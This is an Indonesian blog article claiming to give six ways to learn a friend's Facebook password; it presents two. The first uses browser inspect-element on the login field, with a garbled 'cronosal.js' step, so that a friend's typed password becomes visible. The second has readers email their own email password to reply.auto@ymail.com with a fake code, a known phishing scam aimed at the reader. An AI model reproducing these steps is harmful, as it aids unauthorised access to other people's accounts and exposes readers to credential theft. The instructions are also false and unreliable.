6 Cara Mengetahui Password Facebook Teman Mudah dan Simpel

Cara mengetahui password Facebook teman adalah pembahasan yang akan diulas pada artikel kali ini. Siapa sih yang tidak mengenal Facebook? Mulai dari anak-anak, remaja, dan dewasa sebagian besar mempunyai akun Facebook. Melalui Facebook kita dapat berselancar berteman dengan siapapun di dunia maya. Facebook milik pribadi dilindungi dengan adanya password. Password ini hanya diketahui oleh pemilik akun saja, kecuali memang ia membocorkan kepada orang lain. Untuk saat-saat tertentu bisa jadi kita membutuhkan teman yang harus mengetahui password kita, begitu pula sebaliknya ada teman yang kadang membutuhkan kita untuk menjaga passwordnya. 

Cara Mengetahui Password Facebook Teman Mudah

Baca juga : Melihat Facebook Teman Tanpa Ketahuan

Oleh karena itu, mengetahui Facebook teman bukanlah hal yang bisa disalahkan jika itu memang berguna. Lalu, jika Anda penasaran dengan Facebook teman dan dia tidak memberikannya, ini juga cara yang mudah. Tetapi selalu ingat ini hanya untuk memberikan jawaban atas rasa penasaran Anda saja, jangan disalahgunakan. Pertama, buka laman www.Facebook.com tetapi jangan buru-buru login, karena Anda tidak akan login dengan akun Anda melainkan akan kepo password teman Facebook.

Cara mengetahui password Facebook teman selanjutnya setelah masuk ke laman Facebook, arahkan kursor pada kolom password. Klik kanan dan klik periksa elemen atau inspect elemen. Pada tulisan password di klik dua kali, lalu kata password tersebut diganti menjadi cronosal.js, dan tutup form itu dengan silang pojok kanan atas. Nah, jika sudah sampai pada tahap ini, maka mintalah teman Anda untuk login Facebook dengan laptop atau komputer Anda yang sudah disetting tersebut. Password yang dia tulis akan terlihat padahal umumnya password tidak terlihat. Nah, Anda bisa menyimak password apa yang dituliskan oleh teman Anda tersebut.

Cara lainnya adalah dengan membuka email lalu login menggunakan email Anda, dan ini dikhususkan untuk pengguna Gmail/Yahoo. Kemudian masuk ke halaman untuk kirim pesan dan kirimlah pesan ke reply.auto@ymail.com dengan bc dan cc dibiarkan kosong. Untuk kolom subjek isilah PASSWORD RETRIEVE, dan pada bagian isi pesan diisi baris pertama alamat email Anda, baris kedua alamat email teman Anda yang digunakan untuk Facebook, ketiga password email Anda, dan keempat tulis kode cgi-bin/$et76431&pwr999.

Dari pembahasan tersebut sudah pahamkah Anda mengenai fungsi Facebook maupun passwordnya? Jika tidak ada password, mungkin saja Facebook kita akan diobrak-abrik oleh siapapun orang-orang yang tidak bertanggung jawab. Untuk itu, setiap akun yang kita miliki dilindungi dengan password yang bisa kita ganti kapan saja. Cara mengetahui password Facebook teman telah diulas pada artikel ini dan semoga memberikan ulasan yang bermanfaat untuk Anda. Begitu pula jika Anda mempercayakan password Facebook Anda pada teman, pilihlah teman-teman yang benar-benar Anda percaya sesuai hati nurani yang tidak akan mungkin menyalahkan kepercayaan Anda.
 
Internet Blogs
blog links Top academics blogs internet blogs blogs
internet blogs blogs